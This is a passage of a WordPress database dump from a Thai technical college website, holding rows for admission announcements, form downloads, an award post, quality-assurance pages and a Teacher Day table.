(4904, 3, '2019-01-07 11:15:08', '2019-01-07 04:15:08', '', 'หนังสือมอบอำนาจ สำหรับลงทะเบียน', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ab%e0%b8%99%e0%b8%b1%e0%b8%87%e0%b8%aa%e0%b8%b7%e0%b8%ad%e0%b8%a1%e0%b8%ad%e0%b8%9a%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%b2%e0%b8%88-%e0%b8%aa%e0%b8%b3%e0%b8%ab%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%a5', '', '', '2019-01-07 11:15:08', '2019-01-07 04:15:08', '', 4830, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/หนังสือมอบอำนาจ-สำหรับลงทะเบียน.pdf', 0, 'attachment', 'application/pdf', 0),
(4905, 3, '2019-01-07 11:17:20', '2019-01-07 04:17:20', '<a href=\"/wp-content/uploads/2018/12/25-12-2561-14-36-29.png\">\r\n<img class=\"aligncenter wp-image-4832 size-full\" src=\"/wp-content/uploads/2018/12/25-12-2561-14-36-29.png\" alt=\"\" width=\"1047\" height=\"815\" /></a>\r\n<h1><span style=\"color: #ff0000;\">ดาวน์โหลดแบบฟอร์ม หนังสือมอบอำนาจ >></span><strong><span style=\"color: #ff0000;\"> <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/12/หนังสือมอบอำนาจ-สำหรับลงทะเบียน.pdf\">คลิก</a>!</span></strong></h1>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%82%E0%B8%84%E0%B8%A7%E0%B8%95%E0%B8%B2-%E0%B8%A0%E0%B8%B2%E0%B8%A2%E0%B8%99%E0%B8%AD%E0%B8%81edit.pdf.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการคัดเลือกนักเรียน นักศึกษาโควตา (ภายนอก) หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา ๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4830-revision-v1', '', '', '2019-01-07 11:17:20', '2019-01-07 04:17:20', '', 4830, 'http://www.technicrayong.ac.th/4830-revision-v1/', 0, 'revision', '', 0),
(4906, 3, '2019-01-07 11:20:34', '2019-01-07 04:20:34', '<a href=\"/wp-content/uploads/2018/12/25-12-2561-14-36-29.png\"><img class=\"aligncenter wp-image-4832 size-full\" src=\"/wp-content/uploads/2018/12/25-12-2561-14-36-29.png\" alt=\"\" width=\"1047\" height=\"815\" /></a>\r\n<h1><span style=\"color: #ff0000;\">ดาวน์โหลดแบบฟอร์ม หนังสือมอบอำนาจ >></span><strong><span style=\"color: #ff0000;\"> <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/12/หนังสือมอบอำนาจ-สำหรับลงทะเบียน.pdf\">คลิก</a>!</span></strong></h1>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%82%E0%B8%84%E0%B8%A7%E0%B8%95%E0%B8%B2-%E0%B8%A0%E0%B8%B2%E0%B8%A2%E0%B9%83%E0%B8%99.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการคัดเลือกนักศึกษาโควตา (ภายใน) ปีการศึกษา ๒๕๖๒ หลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ผู้จบหลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.)', '', 'inherit', 'closed', 'closed', '', '4826-revision-v1', '', '', '2019-01-07 11:20:34', '2019-01-07 04:20:34', '', 4826, 'http://www.technicrayong.ac.th/4826-revision-v1/', 0, 'revision', '', 0),
(4907, 3, '2019-01-07 11:24:44', '2019-01-07 04:24:44', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D728434850866039%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'แผนกคหกรรมศาสตร์ วิทยาลัยเทคนิคระยอง ได้รับรางวัลรองชนะเลิศอันดับ ๑ “การประกวดการจัดดอกไม้เชิงธุรกิจสู่มาตรฐานสากล(ช่อบูเก้)” ระดับ ปวส. และ รางวัลชมเชย “การประกวดการจัดแจกันดอกไม้แบบไทย” ระดับ ปวช. ในระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ณ วิทยาลัยสารพัดช่างจันทบุรี จังหวัดจันทบุรี', '', 'publish', 'closed', 'open', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%84%e0%b8%ab%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b9%8c-%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5', '', '', '2019-01-07 11:24:44', '2019-01-07 04:24:44', '', 0, 'http://www.technicrayong.ac.th/?p=4907', 185, 'post', '', 0),
(4908, 3, '2019-01-07 11:24:19', '2019-01-07 04:24:19', '', '48380602_728434737532717_7711788125575446528_o', '', 'inherit', 'closed', 'closed', '', '48380602_728434737532717_7711788125575446528_o', '', '', '2019-01-07 11:24:19', '2019-01-07 04:24:19', '', 4907, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/48380602_728434737532717_7711788125575446528_o.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4909, 3, '2019-01-07 11:24:44', '2019-01-07 04:24:44', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D728434850866039%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'แผนกคหกรรมศาสตร์ วิทยาลัยเทคนิคระยอง ได้รับรางวัลรองชนะเลิศอันดับ ๑ “การประกวดการจัดดอกไม้เชิงธุรกิจสู่มาตรฐานสากล(ช่อบูเก้)” ระดับ ปวส. และ รางวัลชมเชย “การประกวดการจัดแจกันดอกไม้แบบไทย” ระดับ ปวช. ในระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ณ วิทยาลัยสารพัดช่างจันทบุรี จังหวัดจันทบุรี', '', 'inherit', 'closed', 'closed', '', '4907-revision-v1', '', '', '2019-01-07 11:24:44', '2019-01-07 04:24:44', '', 4907, 'http://www.technicrayong.ac.th/4907-revision-v1/', 0, 'revision', '', 0),
(4910, 1, '2019-01-07 12:13:42', '2019-01-07 05:13:42', '[[\"\\u0e40\\u0e25\\u0e02\\u0e17\\u0e35\\u0e48\",\"\\u0e0a\\u0e37\\u0e48\\u0e2d\",\"\\u0e2a\\u0e01\\u0e38\\u0e25\",\"\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\",\"Link\"],[\"001\\/2561\",\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e34\\u0e15\",\"\\u0e1b\\u0e2d\\u0e04\\u0e39\\u0e2a\\u0e38\\u0e27\\u0e23\\u0e23\\u0e13\",\"\\u0e27\\u0e34\\u0e17\\u0e22\\u0e32\\u0e25\\u0e31\\u0e22\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e23\\u0e30\\u0e22\\u0e2d\\u0e07\",\"<a href=\\\"\\/teacher-day\\/test.php?tid=1\\\">Open<\\/a>\"],[\"002\\/2561\",\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e34\\u0e0d\\u0e0d\\u0e32\",\"\\u0e08\\u0e33\\u0e40\\u0e19\\u0e35\\u0e22\\u0e23\\u0e1e\\u0e25\",\"\\u0e27\\u0e34\\u0e17\\u0e22\\u0e32\\u0e25\\u0e31\\u0e22\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e23\\u0e30\\u0e22\\u0e2d\\u0e07\",\"<a href=\\\"\\/teacher-day\\/test.php?tid=2\\\">Open<\\/a>\"],[\"003\\/2561\",\"\\u0e19\\u0e32\\u0e22\\u0e2a\\u0e31\\u0e19\\u0e15\\u0e34\\u0e0a\\u0e31\\u0e22\",\"\\u0e21\\u0e35\\u0e0a\\u0e2d\\u0e1a\",\"\\u0e27\\u0e34\\u0e17\\u0e22\\u0e32\\u0e25\\u0e31\\u0e22\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e23\\u0e30\\u0e22\\u0e2d\\u0e07\",\"<a href=\\\"\\/teacher-day\\/test.php?tid=3\\\">Open<\\/a>\"],[\"004\\/2561\",\"\\u0e19\\u0e32\\u0e22\\u0e08\\u0e31\\u0e01\\u0e23\\u0e01\\u0e24\\u0e29\\u0e13\\u0e4c\",\"\\u0e17\\u0e31\\u0e1a\\u0e17\\u0e34\\u0e21\\u0e17\\u0e2d\\u0e07\",\"\\u0e27\\u0e34\\u0e17\\u0e22\\u0e32\\u0e25\\u0e31\\u0e22\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e23\\u0e30\\u0e22\\u0e2d\\u0e07\",\"<a href=\\\"\\/teacher-day\\/test.php?tid=4\\\">Open<\\/a>\"]]', 'Teacher-Day', 'วันครู', 'publish', 'closed', 'closed', '', 'teacher-day', '', '', '2019-01-07 17:26:54', '2019-01-07 10:26:54', '', 0, 'http://www.technicrayong.ac.th/?post_type=tablepress_table&p=4910', 0, 'tablepress_table', 'application/json', 0),
(4911, 1, '2019-01-07 12:15:07', '2019-01-07 05:15:07', '[[\"001\\/2562\",\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e34\\u0e0d\\u0e0d\\u0e32\",\"\\u0e08\\u0e33\\u0e40\\u0e19\\u0e35\\u0e22\\u0e23\\u0e1e\\u0e25\",\"\\u0e27\\u0e34\\u0e17\\u0e22\\u0e32\\u0e25\\u0e31\\u0e22\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e23\\u0e30\\u0e22\\u0e2d\\u0e07\",\"Download\"]]', 'Teacher-Day', 'วันครู', 'inherit', 'closed', 'closed', '', '4910-revision-v1', '', '', '2019-01-07 12:15:07', '2019-01-07 05:15:07', '', 4910, 'http://www.technicrayong.ac.th/4910-revision-v1/', 0, 'revision', '', 0),
(4912, 1, '2019-01-07 12:18:31', '2019-01-07 05:18:31', '[[\"\\u0e40\\u0e25\\u0e02\\u0e17\\u0e35\\u0e48\",\"\\u0e0a\\u0e37\\u0e48\\u0e2d\",\"\\u0e2a\\u0e01\\u0e38\\u0e25\",\"\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\",\"Link\"],[\"001\\/2561\",\"\\u0e1b\\u0e23\\u0e34\\u0e0d\\u0e0d\\u0e32\",\"\\u0e08\\u0e33\\u0e40\\u0e19\\u0e35\\u0e22\\u0e23\\u0e1e\\u0e25\",\"\\u0e27\\u0e34\\u0e17\\u0e22\\u0e32\\u0e25\\u0e31\\u0e22\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e23\\u0e30\\u0e22\\u0e2d\\u0e07\",\"Download\"]]', 'Teacher-Day', 'วันครู', 'inherit', 'closed', 'closed', '', '4910-revision-v1', '', '', '2019-01-07 12:18:31', '2019-01-07 05:18:31', '', 4910, 'http://www.technicrayong.ac.th/4910-revision-v1/', 0, 'revision', '', 0),
(4913, 1, '2019-01-07 12:22:05', '2019-01-07 05:22:05', '[[\"\\u0e40\\u0e25\\u0e02\\u0e17\\u0e35\\u0e48\",\"\\u0e0a\\u0e37\\u0e48\\u0e2d\",\"\\u0e2a\\u0e01\\u0e38\\u0e25\",\"\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\",\"Link\"],[\"001\\/2561\",\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e34\\u0e15\",\"\\u0e1b\\u0e2d\\u0e04\\u0e39\\u0e2a\\u0e38\\u0e27\\u0e23\\u0e23\\u0e13\",\"\\u0e27\\u0e34\\u0e17\\u0e22\\u0e32\\u0e25\\u0e31\\u0e22\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e23\\u0e30\\u0e22\\u0e2d\\u0e07\",\"Download\"],[\"002\\/2561\",\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e34\\u0e0d\\u0e0d\\u0e32\",\"\\u0e08\\u0e33\\u0e40\\u0e19\\u0e35\\u0e22\\u0e23\\u0e1e\\u0e25\",\"\\u0e27\\u0e34\\u0e17\\u0e22\\u0e32\\u0e25\\u0e31\\u0e22\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e23\\u0e30\\u0e22\\u0e2d\\u0e07\",\"Download\"],[\"003\\/2561\",\"\\u0e19\\u0e32\\u0e22\\u0e2a\\u0e31\\u0e19\\u0e15\\u0e34\\u0e0a\\u0e31\\u0e22\",\"\\u0e21\\u0e35\\u0e0a\\u0e2d\\u0e1a\",\"\\u0e27\\u0e34\\u0e17\\u0e22\\u0e32\\u0e25\\u0e31\\u0e22\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e23\\u0e30\\u0e22\\u0e2d\\u0e07\",\"Download\"],[\"004\\/2561\",\"\\u0e19\\u0e32\\u0e22\\u0e08\\u0e31\\u0e01\\u0e24\\u0e29\\u0e13\\u0e4c\",\"\\u0e17\\u0e31\\u0e1a\\u0e17\\u0e34\\u0e21\\u0e17\\u0e2d\\u0e07\",\"\\u0e27\\u0e34\\u0e17\\u0e22\\u0e32\\u0e25\\u0e31\\u0e22\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e23\\u0e30\\u0e22\\u0e2d\\u0e07\",\"Download\"]]', 'Teacher-Day', 'วันครู', 'inherit', 'closed', 'closed', '', '4910-revision-v1', '', '', '2019-01-07 12:22:05', '2019-01-07 05:22:05', '', 4910, 'http://www.technicrayong.ac.th/4910-revision-v1/', 0, 'revision', '', 0),
(4914, 3, '2019-01-07 15:02:12', '2019-01-07 08:02:12', '', '7-1-2562 14-59-23', '', 'inherit', 'closed', 'closed', '', '7-1-2562-14-59-23', '', '', '2019-01-07 15:02:12', '2019-01-07 08:02:12', '', 4830, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/7-1-2562-14-59-23.png', 0, 'attachment', 'image/png', 0),
(4915, 3, '2019-01-07 15:02:49', '2019-01-07 08:02:49', '<a href=\"/wp-content/uploads/2018/12/7-1-2562-14-59-23.png\"><img class=\"aligncenter wp-image-4914 size-full\" src=\"/wp-content/uploads/2018/12/7-1-2562-14-59-23.png\" alt=\"\" width=\"1033\" height=\"808\" /></a>\n<h1><span style=\"color: #ff0000;\">ดาวน์โหลดแบบฟอร์ม หนังสือมอบอำนาจ >></span><strong><span style=\"color: #ff0000;\"> <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/12/หนังสือมอบอำนาจ-สำหรับลงทะเบียน.pdf\">คลิก</a>!</span></strong></h1>\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%82%E0%B8%84%E0%B8%A7%E0%B8%95%E0%B8%B2-%E0%B8%A0%E0%B8%B2%E0%B8%A2%E0%B8%99%E0%B8%AD%E0%B8%81edit.pdf.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการคัดเลือกนักเรียน นักศึกษาโควตา (ภายนอก) หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา ๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4830-autosave-v1', '', '', '2019-01-07 15:02:49', '2019-01-07 08:02:49', '', 4830, 'http://www.technicrayong.ac.th/4830-autosave-v1/', 0, 'revision', '', 0),
(4916, 3, '2019-01-07 15:03:56', '2019-01-07 08:03:56', '<a href=\"/wp-content/uploads/2018/12/7-1-2562-14-59-23.png\"><img class=\"aligncenter wp-image-4914 size-full\" src=\"/wp-content/uploads/2018/12/7-1-2562-14-59-23.png\" alt=\"\" width=\"1033\" height=\"808\" /></a>\r\n<h1><span style=\"color: #ff0000;\">ดาวน์โหลดแบบฟอร์ม หนังสือมอบอำนาจ >></span><strong><span style=\"color: #ff0000;\"> <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/12/หนังสือมอบอำนาจ-สำหรับลงทะเบียน.pdf\">คลิก</a>!</span></strong></h1>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%82%E0%B8%84%E0%B8%A7%E0%B8%95%E0%B8%B2-%E0%B8%A0%E0%B8%B2%E0%B8%A2%E0%B8%99%E0%B8%AD%E0%B8%81edit.pdf.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการคัดเลือกนักเรียน นักศึกษาโควตา (ภายนอก) หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา ๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4830-revision-v1', '', '', '2019-01-07 15:03:56', '2019-01-07 08:03:56', '', 4830, 'http://www.technicrayong.ac.th/4830-revision-v1/', 0, 'revision', '', 0),
(4917, 3, '2019-01-07 15:05:09', '2019-01-07 08:05:09', '<a href=\"/wp-content/uploads/2018/12/7-1-2562-14-59-23.png\"><img class=\"aligncenter wp-image-4914 size-full\" src=\"/wp-content/uploads/2018/12/7-1-2562-14-59-23.png\" alt=\"\" width=\"1033\" height=\"808\" /></a>\r\n<h1><span style=\"color: #ff0000;\">ดาวน์โหลดแบบฟอร์ม หนังสือมอบอำนาจ >></span><strong><span style=\"color: #ff0000;\"> <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/12/หนังสือมอบอำนาจ-สำหรับลงทะเบียน.pdf\">คลิก</a>!</span></strong></h1>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%82%E0%B8%84%E0%B8%A7%E0%B8%95%E0%B8%B2-%E0%B8%A0%E0%B8%B2%E0%B8%A2%E0%B9%83%E0%B8%99.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการคัดเลือกนักศึกษาโควตา (ภายใน) ปีการศึกษา ๒๕๖๒ หลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ผู้จบหลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.)', '', 'inherit', 'closed', 'closed', '', '4826-revision-v1', '', '', '2019-01-07 15:05:09', '2019-01-07 08:05:09', '', 4826, 'http://www.technicrayong.ac.th/4826-revision-v1/', 0, 'revision', '', 0),
(4919, 3, '2019-01-28 14:21:29', '2019-01-28 07:21:29', '<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\n\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\n\n \n<h3><a href=\"https://drive.google.com/file/d/0B7ghyAKLnNIXSWRFUVVoQUZJSFk/view\"><span style=\"color: #0000ff;\">โลโก้วิทยาลัยฯ</span></a></h3>\n<h3><a href=\"/wp-content/uploads/2018/06/คู่มือการประเมินสถานศึกษาอาชีวศึกษาพระราชทาน.pdf\">คู่มือการประเมินสถานศึกษาอาชีวศึกษา เพื่อรับรางวัลพระราชทาน</a></h3>\n<h3><strong><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/%E0%B8%84%E0%B8%A7%E0%B8%B2%E0%B8%A1%E0%B8%AA%E0%B8%B3%E0%B8%84%E0%B8%B1%E0%B8%8D%E0%B8%82%E0%B8%AD%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B9%80%E0%B8%A1%E0%B8%B4%E0%B8%99%E0%B8%84%E0%B8%B8%E0%B8%93%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%AA%E0%B8%96%E0%B8%B2%E0%B8%99%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2%E0%B9%82%E0%B8%94%E0%B8%A2%E0%B8%95%E0%B9%89%E0%B8%99%20%E0%B8%9C%E0%B8%AD_%E0%B8%AA%E0%B8%B4%E0%B8%A3%E0%B8%B4%E0%B8%A3%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B9%8C.ppt\">ความรู้ด้านการประกันคุณภาพ</a></strong></h3>\n<h3><strong><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/%E0%B8%9D%E0%B9%88%E0%B8%B2%E0%B8%A2%E0%B8%A7%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%20%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B1%E0%B8%99%E0%B8%84%E0%B8%B8%E0%B8%93%E0%B8%A0%E0%B8%B2%E0%B8%9E/%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B9%83%E0%B8%8A%E0%B9%89%E0%B9%80%E0%B8%81%E0%B9%87%E0%B8%9A%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5/%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD.zip\">แบบฟอร์มเครื่องมือที่ใช้เก็บรวบรวมข้อมูล</a></strong></h3>\n<h3><span style=\"color: #0000ff;\"><a href=\"/รายงานการประเมินตนเอง-sar\">รายงานการประเมินตนเอง (SAR)</a> </span></h3>\n<h3><a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9-2/\"><span style=\"color: #0000ff;\"><strong>ข้อมูลนักเรียน นักศึกษา</strong></span></a></h3>\n<h3><a href=\"/มาตรฐานการศึกษาสถานศึก\"><span style=\"color: #0000ff;\">มาตรฐานการศึกษาสถานศึกษา</span></a></h3>\n \n\n ', 'งานประกันคุณภาพและมาตรฐานการศึกษา', '', 'inherit', 'closed', 'closed', '', '1753-autosave-v1', '', '', '2019-01-28 14:21:29', '2019-01-28 07:21:29', '', 1753, 'http://www.technicrayong.ac.th/1753-autosave-v1/', 0, 'revision', '', 0),
(4920, 3, '2019-01-07 15:29:46', '2019-01-07 08:29:46', '<p style=\"text-align: center;\">[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2021%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B9%80%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B2%E0%B8%95%E0%B8%A3%E0%B8%90%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2%E0%B8%82%E0%B8%AD%E0%B8%87%E0%B8%A7%E0%B8%B4%E0%B8%97%E0%B8%A2%E0%B8%B2%E0%B8%A5%E0%B8%B1%E0%B8%A2%E0%B9%80.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]</p>', 'มาตรฐานการศึกษาสถานศึกษา ปีการศึกษา ๒๕๖๓', '', 'publish', 'closed', 'closed', '', '%e0%b8%a1%e0%b8%b2%e0%b8%95%e0%b8%a3%e0%b8%90%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%a8%e0%b8%b6%e0%b8%81', '', '', '2021-05-21 10:12:39', '2021-05-21 03:12:39', '', 0, 'http://www.technicrayong.ac.th/?page_id=4920', 0, 'page', '', 0),
(4921, 3, '2019-01-07 15:27:48', '2019-01-07 08:27:48', '', 'มาตรฐานการศึกษาของสถานศึกษา 61-compressed', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a1%e0%b8%b2%e0%b8%95%e0%b8%a3%e0%b8%90%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b8%82%e0%b8%ad%e0%b8%87%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99', '', '', '2019-01-07 15:27:48', '2019-01-07 08:27:48', '', 4920, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/มาตรฐานการศึกษาของสถานศึกษา-61-compressed.pdf', 0, 'attachment', 'application/pdf', 0),
(4922, 3, '2019-01-07 15:29:46', '2019-01-07 08:29:46', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%A1%E0%B8%B2%E0%B8%95%E0%B8%A3%E0%B8%90%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2%E0%B8%82%E0%B8%AD%E0%B8%87%E0%B8%AA%E0%B8%96%E0%B8%B2%E0%B8%99%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2-61-compressed.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'มาตรฐานการศึกษาสถานศึกษา ปีการศึกษา ๒๕๖๑', '', 'inherit', 'closed', 'closed', '', '4920-revision-v1', '', '', '2019-01-07 15:29:46', '2019-01-07 08:29:46', '', 4920, 'http://www.technicrayong.ac.th/4920-revision-v1/', 0, 'revision', '', 0),
(4924, 3, '2019-01-07 15:30:49', '2019-01-07 08:30:49', '<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />\r\n<h3><a href=\"https://drive.google.com/file/d/0B7ghyAKLnNIXSWRFUVVoQUZJSFk/view\"><span style=\"color: #0000ff;\">โลโก้วิทยาลัยฯ</span></a></h3>\r\n<h3><a 